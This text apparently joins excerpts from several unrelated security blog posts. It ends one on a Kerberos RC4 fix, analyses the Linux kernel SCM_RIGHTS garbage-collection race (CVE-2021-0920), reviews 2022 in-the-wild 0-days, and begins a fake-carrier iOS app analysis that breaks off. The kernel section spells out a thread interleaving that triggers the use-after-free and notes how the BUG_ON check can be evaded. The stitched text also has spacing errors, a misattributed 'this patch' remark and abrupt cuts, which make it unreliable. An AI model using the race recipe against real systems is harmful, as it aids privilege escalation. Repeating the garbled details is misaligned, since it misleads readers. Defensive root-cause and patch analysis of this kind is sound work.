The only fix I can find is in the KDC service for the domain controller. Microsoft has added a new flag which, by default, disables the RC4-MD4 algorithm and an old variant of RC4-HMAC with the encryption type -133. This behavior can be re-enabled by setting the KDC configuration registry value AllowOldNt4Crypto. The reference to NT4 is a good indication of how long this vulnerability has existed, as it presumably pre-dates the introduction of Kerberos in Windows 2000. There are probably some changes to the client as well, but I couldn't immediately find them and it's not really worth my time to reverse engineer it.
It'd be good to mitigate the risk of similar attacks before they're found. Disabling RC4 is definitely recommended, however that can bring its own problems. If this particular vulnerability was being exploited in the wild it should be pretty easy to detect: unusual Kerberos encryption types would be an immediate red flag, as would the repeated login attempts.
Another option is to enforce Kerberos Armoring (FAST) on all clients and KDCs in the environment. This would make it more difficult to inspect and tamper with Kerberos authentication traffic. However, it's not a panacea: for FAST to work, the domain joined computer needs to first authenticate without FAST to get a key it can then use for protecting the communications. If that initial authentication is compromised, the entire protection fails.
Guest Post by Xingyu Jin, Android Security Research
This is part one of a two-part guest blog post, where first we'll look at the root cause of the CVE-2021-0920 vulnerability. In the second post, we'll dive into the in-the-wild 0-day exploitation of the vulnerability and post-compromise modules.
Overview of in-the-wild CVE-2021-0920 exploits
A surveillance vendor named Wintego developed an exploit for a Linux socket syscall 0-day, CVE-2021-0920, and used it in the wild since at least November 2020 (based on the earliest captured sample) until the issue was fixed in November 2021. Combined with Chrome and Samsung browser exploits, the vendor was able to remotely root Samsung devices. The fix was released with the November 2021 Android Security Bulletin, and applied to Samsung devices in Samsung's December 2021 security update.
Google's Threat Analysis Group (TAG) discovered Samsung browser exploit chains being used in the wild. TAG then performed root cause analysis and discovered that this vulnerability, CVE-2021-0920, was being used to escape the sandbox and elevate privileges. CVE-2021-0920 was reported to Linux/Android anonymously. The Google Android Security Team performed the full deep-dive analysis of the exploit.
This issue was initially discovered in 2016 by a RedHat kernel developer and disclosed in a public email thread, but the Linux kernel community did not patch the issue until it was re-reported in 2021.
Various Samsung devices were targeted, including the Samsung S10 and S20. By abusing an ephemeral race condition in Linux kernel garbage collection, the exploit code was able to obtain a use-after-free (UAF) on a kernel sk_buff object. The in-the-wild sample could effectively circumvent CONFIG_ARM64_UAO, achieve arbitrary read/write primitives and bypass Samsung RKP to elevate to root. Other Android devices were also vulnerable, but we did not find any exploit samples against them.
Text extracted from captured samples dubbed the vulnerability “quantum Linux kernel garbage collection”, which appears to be a fitting title for this blogpost.
Introduction
CVE-2021-0920 is a use-after-free (UAF) due to a race condition in the garbage collection system for SCM_RIGHTS. SCM_RIGHTS is a control message that allows unix-domain sockets to transmit an open file descriptor from one process to another. In other words, the sender transmits a file descriptor and the receiver then obtains a file descriptor from the sender. This passing of file descriptors adds complexity to reference-counting file structs. To account for this, the Linux kernel community designed a special garbage collection system. CVE-2021-0920 is a vulnerability within this garbage collection system. By winning a race condition during the garbage collection process, an adversary can exploit the UAF on the socket buffer, sk_buff object. In the following sections, we’ll explain the SCM_RIGHTS garbage collection system and the details of the vulnerability. The analysis is based on the Linux 4.14 kernel.
What is SCM_RIGHTS?
Linux developers can share file descriptors (fd) from one process to another using the SCM_RIGHTS datagram with the sendmsg syscall. When a process passes a file descriptor to another process, SCM_RIGHTS will add a reference to the underlying file struct. This means that the process that is sending the file descriptors can immediately close the file descriptor on their end, even if the receiving process has not yet accepted and taken ownership of the file descriptors. When the file descriptors are in this "queued" state (meaning the sender has passed the fd and then closed it, but the receiver has not yet accepted the fd and taken ownership), specialized garbage collection is needed. This LWN article does a great job explaining SCM_RIGHTS reference counting, and it's recommended reading before continuing on with this blogpost.
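Python 3.9+ wraps SCM_RIGHTS directly, which makes the mechanics easy to demonstrate:

import socket

a, b = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)

# Queue a's own descriptor on b's receive queue; the kernel takes an
# extra reference to the underlying file struct at this point.
socket.send_fds(a, [b"hello"], [a.fileno()])

# The receiver gets a freshly installed descriptor for the same file.
msg, fds, flags, addr = socket.recv_fds(b, 1024, 1)
print(msg, fds)  # b'hello' and a list with one new fd number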
Sending
As stated previously, a unix domain socket uses the syscall sendmsg to send a file descriptor to another socket. To explain the reference counting that occurs during SCM_RIGHTS, we'll start from the sender's point of view, with the kernel function unix_stream_sendmsg, which implements the sendmsg syscall. To implement the SCM_RIGHTS functionality, the kernel uses the structure scm_fp_list for managing all the transmitted file structures; scm_fp_list stores the list of file pointers to be passed.
struct scm_fp_list {
    short count;
    short max;
    struct user_struct *user;
    struct file *fp[SCM_MAX_FD];
};
unix_stream_sendmsg invokes scm_send (af_unix.c#L1886) to initialize the scm_fp_list structure, linked by the scm_cookie structure on the stack.
struct scm_cookie {
    struct pid *pid;            /* Skb credentials */
    struct scm_fp_list *fp;     /* Passed files */
    struct scm_creds creds;     /* Skb credentials */
#ifdef CONFIG_SECURITY_NETWORK
    u32 secid;                  /* Passed security ID */
#endif
};
To be more specific, scm_send → __scm_send → scm_fp_copy (scm.c#L68) reads the file descriptors from userspace and initializes scm_cookie->fp, which can contain up to SCM_MAX_FD file structures.
Since the Linux kernel uses the sk_buff (also known as socket buffers or skb) object to manage all types of socket datagrams, the kernel also needs to invoke the unix_scm_to_skb function to link the scm_cookie->fp to a corresponding skb object. This occurs in unix_attach_fds (scm.c#L103):
…
/*
* Need to duplicate file references for the sake of garbage
* collection. Otherwise a socket in the fps might become a
* candidate for GC while the skb is not yet queued.
*/
UNIXCB(skb).fp = scm_fp_dup(scm->fp);
if (!UNIXCB(skb).fp)
    return -ENOMEM;
…
The scm_fp_dup call in unix_attach_fds increases the reference count of each file descriptor that's being passed, so the files remain valid even after the sender closes the transmitted file descriptors later.
Let's examine a concrete example. Assume we have sockets A and B, and socket A attempts to pass itself to B. After the SCM_RIGHTS datagram is sent, the newly allocated skb from the sender will be appended to B's sk_receive_queue, which stores received datagrams:
sk_buff carries scm_fp_list structure
The reference count of A is incremented to 2 and the reference count of B is still 1.
Receiving
Now, let's take a look at the receiver side in unix_stream_read_generic (we will not discuss the MSG_PEEK flag yet, and focus on the normal routine). First, the kernel grabs the current skb from sk_receive_queue using skb_peek. Then, since scm_fp_list is attached to the skb, the kernel calls unix_detach_fds to parse the transmitted file structures from the skb and clear the skb from sk_receive_queue:
/* Mark read part of skb as used */
if (!(flags & MSG_PEEK)) {
    UNIXCB(skb).consumed += chunk;

    sk_peek_offset_bwd(sk, chunk);

    if (UNIXCB(skb).fp)
        unix_detach_fds(&scm, skb);

    if (unix_skb_len(skb))
        break;

    skb_unlink(skb, &sk->sk_receive_queue);
    consume_skb(skb);

    if (scm.fp)
        break;
The function scm_detach_fds iterates over the list of passed file descriptors (scm->fp) and installs the new file descriptors accordingly for the receiver:
for (i = 0, cmfptr = (__force int __user *)CMSG_DATA(cm); i < fdmax;
     i++, cmfptr++) {
    ...
}
...
/*
 * All of the files that fit in the message have had their
 * usage counts incremented, so we just free the list.
 */
__scm_destroy(scm);
Once the file descriptors have been installed, __scm_destroy cleans up the allocated scm->fp and decrements the file reference count for every transmitted file structure:
void __scm_destroy(struct scm_cookie *scm)
{
    struct scm_fp_list *fpl = scm->fp;
    int i;

    if (fpl) {
        scm->fp = NULL;
        for (i = fpl->count - 1; i >= 0; i--)
            fput(fpl->fp[i]);
        free_uid(fpl->user);
        kfree(fpl);
    }
}
Reference Counting and Inflight Counting
As mentioned above, when a file descriptor is passed using SCM_RIGHTS, its reference count is immediately incremented. Once the recipient socket has accepted and installed the passed file descriptor, the reference count is then decremented. The complication comes from the “middle” of this operation: after the file descriptor has been sent, but before the receiver has accepted and installed the file descriptor.
Let’s consider the following scenario:
The process creates sockets A and B.
A sends socket A to socket B.
B sends socket B to socket A.
Close A.
Close B.
Scenario for reference count cycle
Both sockets are closed prior to accepting the passed file descriptors. The reference counts of A and B are both 1 and can't be further decremented, because the sockets were removed from the kernel fd table when the respective processes closed them. Therefore the kernel is unable to release the two skbs and sock structures, and an unbreakable cycle is formed. The Linux kernel garbage collection system is designed to prevent memory exhaustion in this particular scenario. The inflight count was implemented to identify potential garbage: each time the reference count is increased due to an SCM_RIGHTS datagram being sent, the inflight count is also incremented.
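For illustration, this unbreakable cycle can be set up from userspace in a few lines (a Python sketch):

import socket

a, b = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)

socket.send_fds(a, [b"x"], [a.fileno()])  # A sends A to B
socket.send_fds(b, [b"x"], [b.fileno()])  # B sends B to A

# Neither side ever receives: after these closes, the only remaining
# references live in the two queued skbs, so only the garbage
# collector can reclaim the sockets.
a.close()
b.close()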
When a file descriptor is sent in an SCM_RIGHTS datagram, the Linux kernel puts its unix_sock into a global list, gc_inflight_list. The kernel increments unix_tot_inflight, which counts the total number of inflight sockets. Then, the kernel increments u->inflight, which tracks the inflight count for each individual file descriptor, in the unix_inflight function (scm.c#L45) invoked from unix_attach_fds.
Thus, here is what the sk_buff looks like when transferring a file descriptor between sockets A and B:
The inflight count of A is incremented
When the socket file descriptor is received from the other side, the unix_sock.inflight count will be decremented.
Let’s revisit the reference count cycle scenario before the close syscall. This cycle is breakable because any socket files can receive the transmitted file and break the reference cycle:
Breakable cycle before close A and B
After closing both of the file descriptors, the reference count equals the inflight count for each of the socket file descriptors, which is a sign of possible garbage:
Unbreakable cycle after close A and B
Now, let’s check another example. Assume we have sockets A, B and 𝛼:
A sends socket A to socket B.
B sends socket B to socket A.
B sends socket B to socket 𝛼.
𝛼 sends socket 𝛼 to socket B.
Close A.
Close B.
Breakable cycle for A, B and 𝛼
The cycle is breakable, because we can get a newly installed file descriptor B' from the socket file descriptor 𝛼, and then a newly installed file descriptor A' from B'.
Garbage Collection
A high level view of garbage collection is available from lwn.net:
"If, instead, the two counts are equal, that file structure might be part of an unreachable cycle. To determine whether that is the case, the kernel finds the set of all in-flight Unix-domain sockets for which all references are contained in SCM_RIGHTS datagrams (for which f_count and inflight are equal, in other words). It then counts how many references to each of those sockets come from SCM_RIGHTS datagrams attached to sockets in this set. Any socket that has references coming from outside the set is reachable and can be removed from the set. If it is reachable, and if there are any SCM_RIGHTS datagrams waiting to be consumed attached to it, the files contained within that datagram are also reachable and can be removed from the set.
At the end of an iterative process, the kernel may find itself with a set of in-flight Unix-domain sockets that are only referenced by unconsumed (and unconsumable) SCM_RIGHTS datagrams; at this point, it has a cycle of file structures holding the only references to each other. Removing those datagrams from the queue, releasing the references they hold, and discarding them will break the cycle."
To be more specific, the SCM_RIGHTS garbage collection system was developed in order to handle the unbreakable reference cycles. To identify which file descriptors are a part of unbreakable cycles:
Add any unix_sock objects whose reference count equals its inflight count to the gc_candidates list.
Determine if the socket is referenced by any sockets outside of the gc_candidates list. If it is then it is reachable, remove it and any sockets it references from the gc_candidates list. Repeat until no more reachable sockets are found.
After this iterative process, only sockets that are solely referenced by other sockets within the gc_candidates list are left.
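The scan described above can be sketched as a small fixed-point computation (an illustration of the algorithm, not the kernel code):

def find_unreachable(sockets):
    # sockets maps a name to {"ref": .., "inflight": .., "queued": [..]},
    # where "queued" lists the sockets carried by SCM_RIGHTS skbs sitting
    # on this socket's receive queue.
    candidates = {s for s, v in sockets.items() if v["ref"] == v["inflight"]}
    changed = True
    while changed:
        changed = False
        for s in sorted(candidates):
            internal = sum(sockets[c]["queued"].count(s) for c in candidates)
            if sockets[s]["ref"] > internal:  # referenced from outside the set
                candidates.remove(s)          # reachable, so not garbage
                changed = True
    return candidates

# The unbreakable A/B cycle from earlier: each socket's only reference
# comes from an skb queued on the other.
cycle = {
    "A": {"ref": 1, "inflight": 1, "queued": ["B"]},
    "B": {"ref": 1, "inflight": 1, "queued": ["A"]},
}
print(find_unreachable(cycle))  # {'A', 'B'}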
Let's take a closer look at how this garbage collection process works. First, the kernel finds all the unix_sock objects whose reference counts equal their inflight counts and puts them into the gc_candidates list (garbage.c#L242).
Next, the kernel removes any sockets that are referenced by other sockets outside of the current gc_candidates list. To do this, the kernel invokes scan_children (garbage.c#138) along with the function pointer dec_inflight to iterate through each candidate’s sk->receive_queue. It decreases the inflight count for each of the passed file descriptors that are themselves candidates for garbage collection (garbage.c#L261):
/* Now remove all internal in-flight reference to children of
 * the candidates.
 */
list_for_each_entry(u, &gc_candidates, link)
    scan_children(&u->sk, dec_inflight, NULL);
After iterating through all the candidates, if a gc candidate still has a positive inflight count it means that it is referenced by objects outside of the gc_candidates list and therefore is reachable. These candidates should not be included in the gc_candidates list so the related inflight counts need to be restored.
To do this, the kernel will put the candidate on not_cycle_list instead, iterate through the receive queue of each transmitted file in the gc_candidates list (garbage.c#L281), and increment the inflight counts back. The entire process is done recursively, in order for the garbage collection to avoid purging reachable sockets:
/* Restore the references for children of all candidates,
* which have remaining references. Do this recursively, so
* only those remain, which form cyclic references.
*
* Use a "cursor" link, to make the list traversal safe, even
* though elements might be moved about.
*/
list_add(&cursor, &gc_candidates);
while (cursor.next != &gc_candidates) {
    u = list_entry(cursor.next, struct unix_sock, link);
Now gc_candidates contains only “garbage”. The kernel restores original inflight counts from gc_candidates, moves candidates from not_cycle_list back to gc_inflight_list and invokes __skb_queue_purge for cleaning up garbage (garbage.c#L306).
/* Now gc_candidates contains only garbage. Restore original
 * inflight counters for these as well, and remove the skbuffs
 * which are creating the cycle(s).
 */
skb_queue_head_init(&hitlist);
list_for_each_entry(u, &gc_candidates, link)
    scan_children(&u->sk, inc_inflight, &hitlist);

/* not_cycle_list contains those sockets which do not make up a
 * cycle. Restore these to the inflight list.
 */
while (!list_empty(&not_cycle_list)) {
    u = list_entry(not_cycle_list.next, struct unix_sock, link);
    __clear_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
    list_move_tail(&u->link, &gc_inflight_list);
}

spin_unlock(&unix_gc_lock);

/* Here we are. Hitlist is filled. Die. */
__skb_queue_purge(&hitlist);

spin_lock(&unix_gc_lock);
__skb_queue_purge clears every skb from the receive queue:
/**
* __skb_queue_purge - empty a list
* @list: list to empty
*
* Delete all buffers on an &sk_buff list. Each buffer is removed from
* the list and one reference dropped. This function does not take the
* list lock and the caller must hold the relevant locks to use it.
There are two ways to trigger the garbage collection process:
wait_for_unix_gc is invoked at the beginning of the sendmsg function if there are more than 16,000 inflight sockets
When a socket file is released by the kernel (i.e., a file descriptor is closed), the kernel will directly invoke unix_gc.
Note that unix_gc is not preemptive. If garbage collection is already in progress, the kernel will not perform another unix_gc invocation.
Now, let's check this example (a breakable cycle) with a pair of sockets f00 and f01, and a single socket 𝛼:
Socket f00 sends socket f00 to socket f01.
Socket f01 sends socket f01 to socket 𝛼.
Close f00.
Close f01.
Before starting the garbage collection process, the status of the socket file descriptors is:
f00: ref = 1, inflight = 1
f01: ref = 1, inflight = 1
𝛼: ref = 1, inflight = 0
Breakable cycle by f00, f01 and 𝛼
During the garbage collection process, f00 and f01 are considered garbage candidates. The inflight count of f00 is dropped to zero, but the count of f01 is still 1 because 𝛼 is not a candidate. Thus, the kernel will restore the inflight count from f01's receive queue. As a result, f00 and f01 are not treated as garbage anymore.
CVE-2021-0920 Root Cause Analysis
When a user receives an SCM_RIGHTS message from recvmsg without the MSG_PEEK flag, the kernel will wait for any garbage collection process that is in progress to finish. However, if the MSG_PEEK flag is set, the kernel will increment the reference count of the transmitted file structures without synchronizing with any ongoing garbage collection process. This may lead to inconsistency of the internal garbage collection state, making the garbage collector mark a non-garbage sock object as garbage to purge.
recvmsg without MSG_PEEK flag
The kernel function unix_stream_read_generic (af_unix.c#L2290) parses the SCM_RIGHTS message and manages the file inflight count when the MSG_PEEK flag is NOT set: it calls unix_detach_fds, which decrements the inflight count and clears the list of passed file descriptors (scm_fp_list) from the skb.
Later, skb_unlink and consume_skb are invoked from unix_stream_read_generic (af_unix.c#L2451) to destroy the current skb. Following the call chain kfree_skb(skb) -> __kfree_skb, the kernel will invoke the function pointer skb->destructor, which redirects to unix_destruct_scm:
static void unix_destruct_scm(struct sk_buff *skb)
{
    struct scm_cookie scm;

    memset(&scm, 0, sizeof(scm));
    scm.pid = UNIXCB(skb).pid;
    if (UNIXCB(skb).fp)
        unix_detach_fds(&scm, skb);

    /* Alas, it calls VFS */
    /* So fscking what? fput() had been SMP-safe since the last Summer */
    scm_destroy(&scm);
    sock_wfree(skb);
}
In fact, unix_detach_fds will not be invoked again here from unix_destruct_scm, because UNIXCB(skb).fp was already cleared by the earlier unix_detach_fds call. Finally, fd_install(new_fd, get_file(fp[i])) from scm_detach_fds is invoked to install a new file descriptor.
recvmsg with MSG_PEEK flag
The recvmsg process is different if the MSG_PEEK flag is set. The MSG_PEEK flag is used during receive to “peek” at the message, but the data is treated as unread. unix_stream_read_generic will invoke scm_fp_dup instead of unix_detach_fds. This increases the reference count of the inflight file (af_unix.c#2149):
/* It is questionable, see note in unix_dgram_recvmsg.
 */
if (UNIXCB(skb).fp)
    scm.fp = scm_fp_dup(UNIXCB(skb).fp);

sk_peek_offset_fwd(sk, chunk);

if (UNIXCB(skb).fp)
    break;
Because the data should be treated as unread, the skb is not unlinked and consumed when the MSG_PEEK flag is set. However, the receiver will still get a new file descriptor for the inflight socket.
recvmsg Examples
Let's see a concrete example. Assume there are the following socket pairs:
f00, f01
f10, f11
Now, the program does the following operations:
f00 → [f00] → f01 (means f00 sends [f00] to f01)
f10 → [f00] → f11
Close(f00)
Breakable cycle by f00, f01, f10 and f11
Here is the status:
inflight(f00) = 2, ref(f00) = 2
inflight(f01) = 0, ref(f01) = 1
inflight(f10) = 0, ref(f10) = 1
inflight(f11) = 0, ref(f11) = 1
If the garbage collection process happens now, before any recvmsg calls, the kernel will choose f 00 as the garbage candidate. However, f 00 will not have the inflight count altered and the kernel will not purge any garbage.
If f 01 then calls recvmsgwithMSG_PEEK flag, the receive queue doesn’t change and the inflight counts are not decremented. f 01 gets a new file descriptor f 00' which increments the reference count on f 00:
MSG_PEEK increment the reference count of f 00 while the receive queue is not cleared
Status:
inflight(f00) = 2, ref(f00) = 3
inflight(f01) = 0, ref(f01) = 1
inflight(f10) = 0, ref(f10) = 1
inflight(f11) = 0, ref(f11) = 1
Then, f01 calls recvmsg without the MSG_PEEK flag; f01's receive queue is cleared. f01 also fetches a new file descriptor f00'':
The receive queue of f01 is cleared and f00'' is obtained from f01
Status:
inflight(f00) = 1, ref(f00) = 3
inflight(f01) = 0, ref(f01) = 1
inflight(f10) = 0, ref(f10) = 1
inflight(f11) = 0, ref(f11) = 1
UAF Scenario
From a high-level perspective, the internal state of Linux garbage collection can become non-deterministic because MSG_PEEK is not synchronized with the garbage collector. There is a race condition where the garbage collector can treat an inflight socket as a garbage candidate while, at the same time, a MSG_PEEK receive increments the file's reference count. As a consequence, the garbage collector may purge the candidate and free the socket buffer while a receiver installs the file descriptor, leading to a use-after-free on the skb object.
Let's see how the captured 0-day sample triggers the bug, step by step (a simplified version; in reality more threads work together, but this demonstrates the core idea). First, the sample allocates the following socket pairs and a single socket 𝛼:
f00, f01
f10, f11
f20, f21
f30, f31
sock 𝛼 (in reality there may be thousands of 𝛼 sockets, used to prolong the garbage collection process in order to evade a BUG_ON check that will be introduced later).
Now, the program does the following operations:
Close the following file descriptors prior to any recvmsg calls:
Close(f00)
Close(f01)
Close(f11)
Close(f10)
Close(f30)
Close(f31)
Close(𝛼)
Here is the status:
inflight(f00) = N + 1, ref(f00) = N + 1
inflight(f01) = 2, ref(f01) = 2
inflight(f10) = 3, ref(f10) = 3
inflight(f11) = 1, ref(f11) = 1
inflight(f20) = 0, ref(f20) = 1
inflight(f21) = 0, ref(f21) = 1
inflight(f31) = 1, ref(f31) = 1
inflight(𝛼) = 1, ref(𝛼) = 1
If the garbage collection process happens now, the kernel performs the following steps:
List f00, f01, f10, f11, f31 and 𝛼 as garbage candidates, and decrease the inflight count for the candidate children in each receive queue.
Since f21 is not considered a candidate, f11's inflight count remains above zero.
Recursively restore the inflight counts.
Nothing is considered garbage.
A potential skb UAF can then be triggered by racing the following operations:
Call recvmsg with the MSG_PEEK flag on f21 to get f11'.
Call recvmsg with the MSG_PEEK flag on f11 to get f10'.
Concurrently perform the following two operations:
Call recvmsg without the MSG_PEEK flag on f11 to get f10''.
Call recvmsg with the MSG_PEEK flag on f10'.
How is this possible? Let's trace an interleaving in which the race is hit and the UAF occurs:
Thread 0 runs the garbage collector while threads 1 and 2 issue the recvmsg calls:
Thread 0: calls unix_gc.
Thread 0 (stage 0): lists f00, f01, f10, f11, f31 and 𝛼 as garbage candidates.
Thread 1: calls recvmsg with the MSG_PEEK flag on f21 to get f11'.
Thread 0 (stage 0): decreases the inflight count of every garbage candidate's children. Status after stage 0:
inflight(f00) = 0
inflight(f01) = 0
inflight(f10) = 0
inflight(f11) = 1
inflight(f31) = 0
inflight(𝛼) = 0
Thread 0 (stage 1): starts restoring inflight counts.
Thread 1: calls recvmsg with the MSG_PEEK flag on f11 to get f10'.
Thread 2: calls recvmsg without the MSG_PEEK flag on f11 to get f10''.
Thread 2: unix_detach_fds sets UNIXCB(skb).fp = NULL.
Thread 2: blocks on spin_lock(&unix_gc_lock).
Thread 0 (stage 1): scan_inflight cannot find candidate children from f11 (its file list was just cleared), so the inflight count mistakenly remains the same.
Thread 0 (stage 2): f00, f01, f10, f31 and 𝛼 are garbage.
Thread 0 (stage 2): starts purging garbage.
Thread 1: starts a recvmsg with the MSG_PEEK flag on f10', expecting to receive f00'.
Thread 1: fetches skb = skb_peek(&sk->sk_receive_queue); this skb is about to be freed by thread 0.
Thread 0 (stage 2): iterates over the garbage, calling __skb_unlink and then kfree_skb on each skb.
Thread 1: state->recv_actor(skb, skip, chunk, state) dereferences the freed skb: use-after-free.
Thread 0: GC finished.
Thread 2: unblocks; garbage collection can start again.
Thread 2: gets f10''.
Therefore, the race condition causes a UAF of the skb object. At first glance, we might blame the second recvmsg syscall, because it clears skb.fp, the passed file list. However, if the first recvmsg syscall doesn't set the MSG_PEEK flag, the UAF is avoided, because unix_notinflight is serialized with the garbage collection: the kernel ensures the garbage collection either has not started or has finished before the inflight count is decremented and the skb removed. After unix_notinflight, the receiver obtains f11' and the inflight sockets no longer form an unbreakable cycle.
Since MSG_PEEK is not serialized with the garbage collection, the kernel still considers f11 a garbage candidate when recvmsg is called with MSG_PEEK set. For this reason, the next recvmsg eventually triggers the bug due to the inconsistent state of the garbage collection process.
In theory, anyone who saw this patch might come up with an exploit against the faulty garbage collector.
Patch in 2021
Let's check the official patch for CVE-2021-0920. For the MSG_PEEK branch, it takes the garbage collection lock unix_gc_lock before performing sensitive actions and releases it immediately afterwards:
…
+ spin_lock(&unix_gc_lock);
+ spin_unlock(&unix_gc_lock);
…
The patch may look confusing at first glance: it's rare to see a lock acquired and released with nothing in between. Regardless, the MSG_PEEK path now waits for any in-progress garbage collection to complete, so the UAF issue is resolved.
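In context, the fix amounts to an empty critical section acting as a barrier in the MSG_PEEK path; roughly like this (abridged from the upstream fix "af_unix: fix garbage collect vs MSG_PEEK"; comments mine, paraphrasing the commit message):
static void unix_peek_fds(struct scm_cookie *scm, struct sk_buff *skb)
{
	scm->fp = scm_fp_dup(UNIXCB(skb).fp);

	/* An empty critical section: acquiring and immediately releasing
	 * unix_gc_lock does no work itself, but it cannot complete while
	 * the garbage collector holds the lock. It therefore guarantees
	 * that any in-flight GC cycle has finished (or not yet begun)
	 * before the peeked files become reachable through a new fd. */
	spin_lock(&unix_gc_lock);
	spin_unlock(&unix_gc_lock);
}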
BUG_ON Added in 2017
In 2017, Andrey Ulanov from Google found another issue in unix_gc and provided a fix commit. Additionally, the patch added a BUG_ON for the inflight count:
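The check sits in unix_notinflight, which afterwards looked approximately like this (abridged from net/unix/af_unix.c; the exact shape varies across kernel versions, and the comment is mine):
void unix_notinflight(struct user_struct *user, struct file *fp)
{
	struct sock *s = unix_get_socket(fp);

	spin_lock(&unix_gc_lock);

	if (s) {
		struct unix_sock *u = unix_sk(s);

		/* The inflight count must never underflow, and the socket
		 * must still be linked on the GC candidate list. */
		BUG_ON(!atomic_long_read(&u->inflight));
		BUG_ON(list_empty(&u->link));

		if (atomic_long_dec_and_test(&u->inflight))
			list_del_init(&u->link);
		unix_tot_inflight--;
	}
	user->unix_inflight--;
	spin_unlock(&unix_gc_lock);
}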
At first glance, it seems that this BUG_ON would prevent CVE-2021-0920 from being exploitable. However, if the exploit code delays garbage collection by crafting a large amount of fake garbage, it can sidestep the BUG_ON check with a heap spray.
To recap, we have discussed the kernel internals of SCM_RIGHTS and the design and implementation of the Linux kernel's garbage collector. We also analyzed the behavior of the MSG_PEEK flag with the recvmsg syscall and how it leads to a kernel UAF through a subtle and arcane race condition.
The bug was publicly spotted in 2016, but unfortunately the Linux kernel community did not accept the proposed patch at that time. Any threat actor who saw the public email thread had a chance to develop an LPE exploit against the Linux kernel.
In part two, we'll look at how the vulnerability was exploited and the functionalities of the post compromise modules.
This blog post is an overview of a talk, “0-day In-the-Wild Exploitation in 2022…so far”, that I gave at the FIRST conference in June 2022. The slides are available here.
For the last three years, we’ve published annual year-in-review reports of 0-days found exploited in the wild. The most recent of these reports is the 2021 Year in Review report, which we published just a few months ago in April. While we plan to stick with that annual cadence, we’re publishing a little bonus report today looking at the in-the-wild 0-days detected and disclosed in the first half of 2022.
As of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we’ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug.
When people think of 0-day exploits, they often think that these exploits are so technologically advanced that there’s no hope to catch and prevent them. The data paints a different picture. At least half of the 0-days we’ve seen so far this year are closely related to bugs we’ve seen before. Our conclusion and findings in the 2020 year-in-review report were very similar.
Many of the 2022 in-the-wild 0-days are due to the previous vulnerability not being fully patched. In the case of the Windows win32k and the Chromium property access interceptor bugs, the execution flows that the proof-of-concept exploits took were patched, but the root cause issue was not addressed: attackers were able to come back and trigger the original vulnerability through a different path. And in the case of the WebKit and Windows PetitPotam issues, the original vulnerability had previously been patched, but at some point regressed so that attackers could exploit the same vulnerability again. In the iOS IOMobileFrameBuffer bug, a buffer overflow was addressed by checking that a size was less than a certain number, but the patch didn't check a minimum bound on that size. For more detailed explanations of three of the 0-days and how they relate to their variants, please see the slides from the talk.
When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that effectively, we need correct and comprehensive fixes.
This is not to minimize the challenges faced by security teams responsible for responding to vulnerability reports. As we said in our 2020 year in review report:
Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done.
Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.
Practically, some of the following efforts can help ensure bugs are correctly and comprehensively fixed. Project Zero plans to continue to help with the following efforts, but we hope and encourage platform security teams and other independent security researchers to invest in these types of analyses as well:
Root cause analysis
Understanding the underlying vulnerability that is being exploited, and how that vulnerability may have been introduced. Performing a root cause analysis helps ensure that a fix addresses the underlying vulnerability rather than just breaking the proof-of-concept. Root cause analysis is generally a prerequisite for successful variant and patch analysis.
Variant analysis
Looking for other vulnerabilities similar to the reported vulnerability. This can involve looking for the same bug pattern elsewhere, more thoroughly auditing the component that contained the vulnerability, modifying fuzzers to understand why they didn’t find the vulnerability previously, etc. Most researchers find more than one vulnerability at the same time. By finding and fixing the related variants, attackers are not able to simply “plug and play” with a new vulnerability once the original is patched.
Patch analysis
Analyzing the proposed (or released) patch for completeness compared to the root cause vulnerability. I encourage vendors to share how they plan to address the vulnerability with the vulnerability reporter early so the reporter can analyze whether the patch comprehensively addresses the root cause of the vulnerability, alongside the vendor’s own internal analysis.
Exploit technique analysis
Understanding the primitive gained from the vulnerability and how it's being used. While it's generally industry-standard to patch vulnerabilities, mitigating exploit techniques doesn't happen as frequently. Not every exploit technique can be mitigated, but the hope is that mitigation becomes the default rather than the exception. Exploit samples will need to be shared more readily in order for vendors and security researchers to be able to perform exploit technique analysis.
Transparently sharing these analyses helps the industry as a whole as well. We publish our analyses at this repository. We encourage vendors and others to publish theirs as well. This allows developers and security professionals to better understand what the attackers already know about these bugs, which hopefully leads to even better solutions and security overall.
NOTE: This issue, CVE-2021-30983, was fixed in iOS 15.2 in December 2021.
Towards the end of 2021 Google's Threat Analysis Group (TAG) shared an iPhone app with me:
App splash screen showing the Vodafone carrier logo and the text "My Vodafone" (not the legitimate Vodafone app)
Although this looks like the real My Vodafone carrier app available in the App Store, it didn't come from the App Store and is not the real application from Vodafone. TAG suspects that a target receives a link to this app in an SMS, after the attacker asks the carrier to disable the target's mobile data connection. The SMS claims that in order to restore mobile data connectivity, the target must install the carrier app and includes a link to download and install this fake app.
This sideloading works because the app is signed with an enterprise certificate, which can be purchased for $299 via the Apple Enterprise developer program. This program allows an eligible enterprise to obtain an Apple-signed embedded.mobileprovision file with the ProvisionsAllDevices key set. An app signed with the developer certificate embedded within that mobileprovision file can be sideloaded on any iPhone, bypassing Apple's App Store review process. While we understand that the Enterprise developer program is designed for companies to push "trusted apps" to their staff's iOS devices, in this case, it appears that it was being used to sideload this fake carrier app.
The app is broken up into multiple frameworks. InjectionKit.framework is a generic privilege escalation exploit wrapper, exposing the primitives you'd expect (kernel memory access, entitlement injection, amfid bypasses) as well as higher-level operations like app installation, file creation and so on.
